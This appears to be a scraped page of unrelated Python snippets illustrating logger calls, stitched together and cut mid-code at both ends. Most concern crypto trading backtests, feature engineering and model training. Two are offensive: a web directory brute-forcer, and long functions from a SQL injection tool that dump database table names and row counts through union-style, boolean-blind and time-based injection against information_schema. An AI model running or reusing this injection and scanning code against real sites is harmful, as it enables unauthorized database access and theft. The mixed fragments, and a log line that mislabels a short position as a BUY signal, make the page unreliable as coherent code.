                logger.info(
                    '[Day: {}] Closing long position {} on {} due to SELL signal'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, close)
                continue

        # Manage SHORT orders
        open_shorts = exchange.get_open_short(asset)
        for o in open_shorts:
            # If close meets stop loss, close position
            if o.should_stop(close):
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to stop loss'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, o.stop_loss)
                continue
            # If signal is BUY we're going to lose money, so we close position
            if signal == SignalType.BUY:
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to BUY signal'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, close)
                continue
            # If signal is HOLD and position is old
            if o.get_age_in_days(day) > 2 and signal == SignalType.HOLD:
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to age'.
                    format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, close)
                continue

        #
        # Open new positions
        #
        # Determine position sizing
        position_coins = asset.position_size(close, order_size)
        # Open the order
        if signal == SignalType.BUY:
            logger.info(
                '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]'
                .format(day, s, close, position_coins * close, position_coins))
            o = exchange.open_order(day,
                                    OrderType.LONG,
                                    asset,
                                    position_coins,
                                    close,
                                    stop_loss=-0.01)  # Stop loss is -1%
            if not o:
                logger.error("LONG FAILED")
        elif signal == SignalType.SELL:
            logger.info(
                '[Day: {}] Opening short position on {} due to BUY signal [Close {}, Price {}, Coins {}]'
                .format(day, s, close, position_coins * close, position_coins))
            o = exchange.open_order(day,
                                    OrderType.SHORT,
                                    asset,
                                    position_coins,
                                    close,
                                    stop_loss=0.01)  # Stop loss is +1%
            if not o:
                logger.error("SHORT FAILED")
        # Add result to dataframe
        result.loc[day, s] = asset.equity(close)
    session.commit()
    return result
Exemple #35
0
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))
            # print url
            try:
                headers = {}
                headers["User-Agent"] = conf['ua']
                r = urllib2.Request(url, headers=headers)
                # pbar.update(1)
                try:
                    response = urllib2.urlopen(r, timeout=2)
                except:
                    logger.error("Time out...")
                    continue  # 有可能卡死

                # 请求完成后睡眠
                time.sleep(stime)

                if response.code != 404:
                    logger.info("Get !!!!" + url)
                    tqdm.write("[%d] => %s" % (response.code, url))

            except urllib2.URLError, e:
                if hasattr(e, 'code') and e.code != 404:
                    tqdm.write("!!! %d => %s" % (e.code, url))

    logger.info("The dictionary queue is empty")
    pbar.close()
    exit(0)

Exemple #36
0
 def getDetection():
     logger.info("Received %s" %(request.url))
     return json.dumps(active.getDetection())
Exemple #37
0
def getDetection():
    global DETECTION
    logger.info("DETECTION status %s" %(str(DETECTION)))
    return DETECTION
Exemple #38
0
 def print_banner(self):
     logger.info("Searching now in {0}..".format(self.engine_name))
     return
Exemple #39
0
def main():
    index = load_dataset('all_merged', return_index=True)
    resultFile = './data/datasets/all_merged/estimators/randomforest_hyperparameters.json'
    estFile = './data/datasets/all_merged/estimators/randomforest_{}.p'
    hyperparameters = {}
    for _sym, data in index.items():
        features = pd.read_csv(data['csv'],
                               sep=',',
                               encoding='utf-8',
                               index_col='Date',
                               parse_dates=True)
        # Replace nan with infinity so that it can later be imputed to a finite value
        features = features.replace([np.inf, -np.inf], np.nan)
        # Derive target classes from closing price
        target_pct = target_price_variation(features['close'])
        target = target_binned_price_variation(target_pct, n_bins=2)
        # target = target_discrete_price_variation(target_pct)

        # Split data in train and blind test set with 70:30 ratio,
        #  most ML models don't take sequentiality into account, but our pipeline
        #  uses a SimpleImputer with mean strategy, so it's best not to shuffle the data.
        X_train, X_test, y_train, y_test = train_test_split(features.values,
                                                            target.values,
                                                            shuffle=False,
                                                            test_size=0.3)
        # Summarize distribution
        print("Training set: # Features {}, # Samples {}".format(
            X_train.shape[1], X_train.shape[0]))
        plot_class_distribution("Training set", _sym, y_train)
        print("Test set: # Features {}, # Samples {}".format(
            X_test.shape[1], X_test.shape[0]))
        plot_class_distribution("Test set", _sym, y_test)
        if not np.isfinite(X_train).all():
            logger.warning("Training x is not finite!")
        if not np.isfinite(y_train).all():
            logger.warning("Training y is not finite!")
        if not np.isfinite(X_test).all():
            logger.warning("Test x is not finite!")
        if not np.isfinite(y_test).all():
            logger.warning("Test y is not finite!")
        # Build pipeline to be used as estimator in bagging classifier
        #  so that each subset of the data is transformed independently
        #  to avoid contamination between folds.
        pipeline = Pipeline([
            (
                'i', SimpleImputer()
            ),  # Replace nan's with the median value between previous and next observation
            (
                's', RobustScaler()
            ),  # Scale data in order to center it and increase robustness against noise and outliers
            #('k', SelectKBest()), # Select top 10 best features
            #('u', RandomUnderSampler()),
            ('c', RandomForestClassifier()),
        ])

        # Perform hyperparameter tuning of the ensemble with 5-fold cross validation
        logger.info("Start Grid search")
        CV_rfc = GridSearchCV(estimator=pipeline,
                              param_grid=RANDOMFOREST_PARAM_GRID,
                              cv=5,
                              n_jobs=4,
                              scoring='neg_mean_squared_error',
                              verbose=1)
        CV_rfc.fit(X_train, y_train)
        logger.info("End Grid search")

        # Take the fitted ensemble with tuned hyperparameters
        clf = CV_rfc.best_estimator_

        # Test ensemble's performance on training and test sets
        logger.info("Classification report on train set")
        predictions1 = clf.predict(X_train)
        print(classification_report(y_train, predictions1))
        logger.info("Classification report on test set")
        predictions2 = clf.predict(X_test)
        print(classification_report(y_test, predictions2))
        stats = {
            'score': accuracy_score(y_train, predictions1),
            'mse': mean_squared_error(y_train, predictions1),
            'test_score': accuracy_score(y_test, predictions2),
            'test_mse': mean_squared_error(y_test, predictions2),
            'cv_best_mse': -1 * CV_rfc.best_score_,  # CV score is negated MSE
            # 'cv_results': CV_rfc.cv_results_,
            'cv_bestparams': CV_rfc.best_params_,
        }
        print(stats)
        with open(estFile.format(_sym), 'wb') as f:
            pickle.dump(clf, f)
        hyperparameters[_sym] = {
            'estimator': estFile.format(_sym),
            'stats': stats
        }
        # feature_importances = np.mean([
        #     p.named_steps.c.feature_importances_ for p in clf.estimators_
        # ], axis=0)

        # importances = {X.columns[i]: v for i, v in enumerate(feature_importances)}
        # labeled = {str(k): v for k, v in sorted(importances.items(), key=lambda item: -item[1])}

        # print({
        #     # 'features':sel_features
        #     'feature_importances': labeled,
        #     # 'rank': {l: i + 1 for i, l in enumerate(labeled.keys())},
        # })
        with open(resultFile, 'w') as f:  # Save results at every update
            json.dump(hyperparameters, f, indent=4)
        print("--- end ---")
Exemple #40
0
        # 移除有重複imdbid的資料
        imdb_manager.remove_duplicate_imdb()
        # 備份
        imdb_manager.backup()
        # 匯出資料庫到lmdb
        imdb_manager.export2lmdb(lmdb_operator.HOST, lmdb_operator.DB)
        # 將imdbid匯出成csv
        imdbcsv_path = imdb_manager.imdbid2csv()

        # lmdb
        # 將imdbid匯入到lmdb
        lmdb_manager.import_imdbid(imdbcsv_path)
        # 更新lmdb中其他來源(開眼、豆瓣…)有,但是imdb來源卻沒有找到的電影
        lmdb_manager.update_imdb_miss_movies()
        # 更新由imdb網站parse的電影
        lmdb_manager.update_imdb_parsed_movies()

        # fixme
        """
        目前的方法是相信imdbpy取得的imdbid是正確的,並且以imdb資料庫的資料為主,若沒有才去imdb網站抓
        若imdbpy取得的imdbid錯誤,則會一直無法更正,要如何自動進行更新?
        """

        ed = datetime.datetime.now()

        message = 'start:%s \t end:%s' % (st, ed)
        logger.info(message)
    except Exception:
        print traceback.format_exc()
        sendmail(traceback.format_exc())
Exemple #41
0
    def get_tables(self):

        # 若databases_name未设置,就跑一下
        if len(self.databases_name) == 0:
            logger.debug("Set the parameters of the self.databases_name...")
            SqliDatabases.get_database(self)

        # 每个databases_name需要跑一次tables_name
        for database_name in self.databases_name:
            # 开始跑database_name
            logger.debug("Start sqli databases %s's tables_name" %
                         database_name)
            tables_name = []

            logger.debug("The sqlirequest is %s, start sqli tables..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")
                # 先注tables的数量

                tables_number = normal_injection(
                    select='COUNT(*)',
                    source="information_schema.tables",
                    conditions="table_schema = '" + database_name + "'",
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Table account sqli success...The tables_number is %d..." %
                    tables_number)
                print "[*] tables_number: %d" % tables_number

                # 每个循环跑一次tables的数据
                for i in trange(int(tables_number),
                                desc="Table sqli...",
                                leave=False,
                                disable=True):
                    # 首先是tablename的长度
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    table_name_len = normal_injection(
                        select='length(`table_name`)',
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isCount=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Table name length sqli success...The table_name_len is %d..."
                        % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" %
                                ((i + 1), table_name_len))

                    # 然后注tablename
                    logger.debug("Start %dth table name sqli..." % (i + 1))

                    table_name = normal_injection(
                        select='`table_name`',
                        source='information_schema.tables',
                        conditions="table_schema = '" + database_name + "'",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Table name sqli success...The table_name is %s..."
                        % ((i + 1), table_name))

                    # 把table_name插入列表
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" %
                                ((i + 1), table_name))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")

                retVal = build_injection(select="COUNT(`table_name`)",
                                         source="information_schema.tables",
                                         conditions="table_schema = '" +
                                         database_name + "'",
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                tables_number = int(retVal)

                logger.debug(
                    "Tables amount sqli success...The tables_number is %d..." %
                    tables_number)
                logger.info("[*] tables_number: %d" % tables_number)

                for i in range(0, int(tables_number)):
                    # 然后注tables_name 的 length
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    retVal = build_injection(
                        select="length(`table_name`)",
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    table_name_len = int(retVal)

                    logger.debug(
                        "%dth Table name length sqli success...The table_name_len is %d..."
                        % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" %
                                ((i + 1), table_name_len))

                    # 然后注tables名字
                    # 清空table_name
                    table_name = ""
                    logger.debug("Start %dth table sqli..." % (i + 1))

                    for j in trange(int(table_name_len),
                                    desc='%dth Table sqli' % (i + 1),
                                    leave=False):
                        retVal = build_injection(
                            select="ascii(substring(`table_name`," +
                            repr(j + 1) + ",1))",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        table_name += chr(retVal)

                    logger.debug(
                        "%dth Table name sqli success...The table_name is %s..."
                        % ((i + 1), table_name))

                    # 把table_name插入列表
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" %
                                ((i + 1), table_name))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table amount sqli...")

                retVal = time_injection(select="COUNT(`table_name`)",
                                        source="information_schema.tables",
                                        conditions="table_schema = '" +
                                        database_name + "'",
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                tables_number = int(retVal)

                logger.debug(
                    "Tables amount sqli success...The tables_number is %d..." %
                    tables_number)
                logger.info("[*] tables_number: %d" % tables_number)

                for i in range(0, int(tables_number)):
                    # 然后注tables_number 的length
                    logger.debug("Start %dth table length sqli..." % (i + 1))

                    retVal = time_injection(select="length(`table_name`)",
                                            source="information_schema.tables",
                                            conditions="table_schema = '" +
                                            database_name + "'",
                                            limit=i,
                                            dealpayload=self.dealpayload,
                                            data=self.Data,
                                            times=self.time,
                                            isCount=True,
                                            sqlirequest=self.sqlirequest)
                    table_name_len = int(retVal)

                    logger.debug(
                        "%dth Table name length sqli success...The table_name_len is %d..."
                        % ((i + 1), table_name_len))
                    logger.info("[*] %dth table_name_len: %d" %
                                ((i + 1), table_name_len))

                    # 然后注tables名字
                    # 清空table_name
                    table_name = ""
                    logger.debug("Start %dth table sqli..." % (i + 1))

                    for j in trange(int(table_name_len),
                                    desc='%dth Table sqli' % (i + 1),
                                    leave=False):
                        retVal = time_injection(
                            select="ascii(substring(`table_name`," +
                            repr(j + 1) + ",1))",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        table_name += chr(retVal)

                    logger.debug(
                        "%dth Table name sqli success...The table_name is %s..."
                        % ((i + 1), table_name))

                    # 把tables_name插入列表
                    tables_name.append(table_name)
                    logger.info("[*] %dth table_name: %s" %
                                ((i + 1), table_name))

            self.tables_name[database_name] = tuple(tables_name)

        print "[*] tables_name list: ", self.tables_name
Exemple #42
0
def getActive():
    global active
    logger.info("active status %s" %(str(active)))
    return active
Exemple #43
0
    def get_content_count(self, database_name, table_name):

        # 开始注内容
        logger.debug("Start sqli table %s content amount..." % table_name)

        # 先GET
        if self.sqlirequest == "GET":
            logger.debug("The sqlirequest is %s, start sqli content..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                # 注数据的数量
                content_count = normal_injection(select="count(*)",
                                                 source=database_name + "." +
                                                 table_name,
                                                 dealpayload=self.dealpayload,
                                                 data=self.Data,
                                                 isCount=True,
                                                 sqlirequest=self.sqlirequest)
                logger.debug(
                    "Content account sqli success...The count is %d..." %
                    content_count)

                # 把content account return回去
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = build_injection(select="count(*)",
                                         source=database_name + "." +
                                         table_name,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content account sqli success...The content_count is %d..."
                    % content_count)
                logger.info("[*] content_count: %d" % content_count)

                # 把content account return回去
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = time_injection(select="count(*)",
                                        source=database_name + "." +
                                        table_name,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content account sqli success...The content_count is %d..."
                    % content_count)
                logger.info("[*] content_count: %d" % content_count)

                # 把content account return回去
                logger.info("[*] content count: %d" % content_count)
                return content_count

        # 然后是post
        elif self.sqlirequest == "POST":
            logger.debug("The sqlirequest is %s, start sqli contents..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                # 注数据的数量

                content_count = normal_injection(select="count(*)",
                                                 source=database_name + "." +
                                                 table_name,
                                                 dealpayload=self.dealpayload,
                                                 data=self.Data,
                                                 isCount=True,
                                                 sqlirequest=self.sqlirequest)

                logger.debug(
                    "Content account sqli success...The count is %d..." %
                    content_count)

                # 把content account return回去
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = build_injection(select="count(*)",
                                         source=database_name + "." +
                                         table_name,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content account sqli success...The content_count is %d..."
                    % content_count)
                logger.info("[*] content_count: %d" % content_count)

                # 把content account return回去
                logger.info("[*] content count: %d" % content_count)
                return content_count

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                logger.debug("Start table's %s content amount sqli..." %
                             table_name)

                retVal = time_injection(select="count(*)",
                                        source=database_name + "." +
                                        table_name,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_count = int(retVal)

                logger.debug(
                    "Content account sqli success...The content_count is %d..."
                    % content_count)
                logger.info("[*] content_count: %d" % content_count)

                # 把content account return回去
                logger.info("[*] content count: %d" % content_count)
                return content_count
Exemple #44
0
from lib.log import logger

if __name__ == '__main__':
    logger.info("test info")
    logger.debug("test debug")
    logger.warning("test warning")
    logger.error("test error")
def build_improved_dataset(source_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)
    index = {}

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)
        ohlcv = _df[entry['features']['ohlcv']]

        ta = _df[entry['features']['ta']]
        ta_7 = _df[entry['features']['ta_7d']]
        cm = _df[entry['features']['cm']]

        ohlcv_stats = pd.DataFrame(index=ohlcv.index)
        #ohlcv_stats['volume'] = ohlcv.volume
        #ohlcv_stats['volume_pct'] = ohlcv.volume.pct_change()
        #ohlcv_stats['close_pct'] = ohlcv.close.pct_change()
        ohlcv_stats['day_range_pct'] = (ohlcv.high - ohlcv.low).pct_change(
        )  # Showld always be > 0, price oscillation range for current day
        ohlcv_stats[
            'direction'] = ohlcv.close - ohlcv.open  # Price direction for the day green > 0, red < 0. Modulus is range.

        cm_picked = pd.DataFrame(index=ohlcv.index)
        if 'adractcnt' in cm.columns:
            cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change()
            # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change()
            # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change()
        # if 'splycur' in cm.columns: ## Correlated with volume and close
        #     cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined)
        if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns:
            # I want to represent miners earnings (fees + issued coins) vs amount transacted in that interval
            cm_picked['earned_vs_transacted'] = (
                cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv
        if 'isstotntv' in cm.columns:
            # isstotntv is total number of coins mined in the time interval
            # splycur is total number of coins mined (all time)
            total_mined = cm.isstotntv.rolling(
                365, min_periods=7).sum()  # total mined in a year
            cm_picked['isstot365_isstot1_pct'] = (total_mined /
                                                  cm.isstotntv).pct_change()
        if 'splycur' in cm.columns and 'isstotntv' in cm.columns:
            cm_picked['splycur_isstot1_pct'] = (cm.splycur /
                                                cm.isstotntv).pct_change()
        if 'hashrate' in cm.columns:
            #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change()
            #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change()
            cm_picked['hashrate_pct'] = cm.hashrate.pct_change()
        if 'roi30d' in cm.columns:
            cm_picked['roi30d'] = cm.roi30d
        if 'isstotntv' in cm.columns:
            cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change()
        if 'feetotntv' in cm.columns:
            cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change()
        if 'txtfrcount' in cm.columns:
            cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change()
            cm_picked['txtfrcount_volume'] = cm.txtfrcount.pct_change()
        if 'vtydayret30d' in cm.columns:
            cm_picked['vtydayret30d'] = cm.vtydayret30d
        if 'isscontpctann' in cm.columns:
            cm_picked['isscontpctann'] = cm.isscontpctann

        ta_picked = pd.DataFrame(index=ta.index)
        # REMA / RSMA are already used and well-estabilished in ATSA,
        # I'm taking the pct change since i want to encode the relative movement of the ema's not their positions
        # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change()
        ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change()
        # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change()
        # ta_picked['rsma_5_20_pct'] = ta.rema_5_20.pct_change()
        ta_picked['rsma_8_15_pct'] = ta.rema_8_15.pct_change()
        # ta_picked['rsma_20_50_pct'] = ta.rema_20_50.pct_change()

        # Stoch is a momentum indicator comparing a particular closing price of a security to a range of its prices
        # over a certain period of time.
        # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or
        # by taking a moving average of the result.
        # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values.
        # IDEA => decrease sensitivity by 3-mean and divide by 100 to get fp values
        ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling(
            3).mean() / 100

        #Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows
        # the relationship between two moving averages of a security’s price.
        # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA.
        #  A nine-day EMA of the MACD called the "signal line," is then plotted on top of the MACD line,
        #  which can function as a trigger for buy and sell signals.
        #  Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security
        #  when the MACD crosses below the signal line.
        #  Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways,
        #  but the more common methods are crossovers, divergences, and rapid rises/falls.
        signal_line = builder.exponential_moving_average(ta.macd_12_26, 9)
        ta_picked['macd_12_26_signal'] = (
            ta.macd_12_26 -
            signal_line).pct_change()  # Relationship with signal line
        ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change(
        )  # Information about slope

        # PPO is identical to the moving average convergence divergence (MACD) indicator,
        # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference.
        signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9)
        ta_picked['ppo_12_26_signal'] = (
            ta.ppo_12_26 -
            signal_line).pct_change()  # Relationship with signal line
        ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change(
        )  # Information about slope

        # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether
        # a stock is being accumulated or distributed.
        # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow.
        # This provides insight into how strong a trend is. If the price is rising but the indicator is falling
        # this indicates that buying or accumulation volume may not be enough to support
        # the price rise and a price decline could be forthcoming.
        # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify
        #           divergences by simply looking at the sign of M.
        #           Another insight would be given by the slope (ie pct_change)
        ta_picked['adi_pct'] = ta.adi.pct_change()
        ta_picked['adi_close_convergence'] = convergence_between_series(
            ta.adi, ohlcv.close, 3)

        # RSI goes from 0 to 100, values <= 20 mean BUY, while values >= 80 mean SELL.
        # Dividing it by 100 to get a floating point feature, makes no sense to pct_change it
        ta_picked['rsi_14_div100'] = ta.rsi_14 / 100

        # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold
        #   signals using both prices and volume data. The oscillator moves between 0 and 100.
        # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold,
        #   although levels of 90 and 10 are also used as thresholds.
        # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while
        #   the price is falling or flat, the price could start rising.
        ta_picked['mfi_14_div100'] = ta.mfi_14 / 100

        # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators
        #   such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator.
        #   It measures momentum on both up and down days and does not smooth results, triggering more frequent
        #   oversold and overbought penetrations. The indicator oscillates between +100 and -100.
        # Many technical traders add a 10-period moving average to this oscillator to act as a signal line.
        #   The oscillator generates a bullish signal when it crosses above the moving average and a
        #   bearish signal when it drops below the moving average.
        ta_picked['cmo_14_div100'] = ta.cmo_14 / 100
        signal_line = builder.simple_moving_average(ta.cmo_14, 10)
        ta_picked['cmo_14_signal'] = (ta.cmo_14 - signal_line) / 100

        # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price.
        # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying.
        # Despite being plotted on a price chart and measured numerically,
        # the actual individual quantitative value of OBV is not relevant.
        # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point,
        # meaning the real number value of OBV arbitrarily depends on the start date.
        # Instead, traders and analysts look to the nature of OBV movements over time;
        # the slope of the OBV line carries all of the weight of analysis. => We want percent change
        ta_picked['obv_pct'] = ta.obv.pct_change()
        ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change()

        # Strong rallies in price should see the force index rise.
        # During pullbacks and sideways movements, the force index will often fall because the volume
        # and/or the size of the price moves gets smaller.
        # => Encoding the percent variation could be a good idea
        ta_picked['fi_13_pct'] = ta.fi_13.pct_change()
        ta_picked['fi_50_pct'] = ta.fi_50.pct_change()

        # The Aroon Oscillator is a trend-following indicator that uses aspects of the
        # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend
        # and the likelihood that it will continue.
        # It moves between -100 and 100. A high oscillator value is an indication of an uptrend
        # while a low oscillator value is an indication of a downtrend.
        ta_picked['ao_14'] = ta.ao_14 / 100

        # The average true range (ATR) is a technical analysis indicator that measures market volatility
        #   by decomposing the entire range of an asset price for that period.
        # ATRP is pct_change of volatility
        ta_picked['atrp_14'] = ta.atrp_14

        # Percentage Volume Oscillator (PVO) is momentum volume oscillator used in technical analysis
        #   to evaluate and measure volume surges and to compare trading volume to the average longer-term volume.
        # PVO does not analyze price and it is based solely on volume.
        #  It compares fast and slow volume moving averages by showing how short-term volume differs from
        #  the average volume over longer-term.
        #  Since it does not care a trend's factor in its calculation (only volume data are used)
        #  this technical indicator cannot be used alone to predict changes in a trend.
        ta_picked['pvo_12_26'] = ta.pvo_12_26

        # IGNORED: tsi, wd, adx,

        #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')

        # Build the dataframe with base features
        # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')
        # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)]

        ohlc = ohlcv[['close', 'volume']].pct_change()
        lagged_ohlc = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')

        # Add lagged features to the dataframe
        improved_df = pd.concat(
            [ohlcv_stats, lagged_ohlc, cm_picked, ta_picked],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')

        # Drop the first 30 rows
        improved_df = improved_df[30:]
        # Drop columns whose values are all nan or inf
        with pd.option_context('mode.use_inf_as_na',
                               True):  # Set option temporarily
            improved_df = improved_df.dropna(axis='columns', how='all')
        # Save the dataframe
        improved_df.to_csv(
            'data/datasets/all_merged/csv/{}_improved.csv'.format(
                _sym.lower()),
            sep=',',
            encoding='utf-8',
            index=True,
            index_label='Date')
        improved_df.to_excel(
            'data/datasets/all_merged/excel/{}_improved.xlsx'.format(
                _sym.lower()),
            index=True,
            index_label='Date')
        unlagged_df = improved_df.loc[:, [
            c for c in improved_df.columns if not '_lag' in c
        ]]
        unlagged_df['target_pct'] = _target.loc[improved_df.index]['pct']
        unlagged_df['target_binary_bin'] = _target.loc[
            improved_df.index]['binary_bin']
        plot_correlation_matrix(
            unlagged_df.corr(),
            unlagged_df.columns,
            title='{} Correlation matrix'.format(_sym),
            save_to='data/datasets/all_merged/{}_improved_corr.png'.format(
                _sym))
        #decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df)
        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}_improved.csv'.format(
                _sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}_improved.xlsx'.format(
                _sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'improved': [c for c in improved_df.columns],
            }
        }
        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index_improved.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
    # Find common features
    common_features = []
    for _sym, entry in index.items():
        features = entry['features']['improved']
        if not common_features:  # if common_features is empty, common_features are all the current features
            common_features = features
        not_common_features = []
        for f in common_features:  # remove features from common_features which are not in features
            if f not in features:
                not_common_features.append(f)
        for f in not_common_features:
            common_features.remove(f)
    for _sym, entry in index.items():
        entry['features']['common'] = common_features
    # Save index again
    with open('data/datasets/all_merged/index_improved.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
Exemple #46
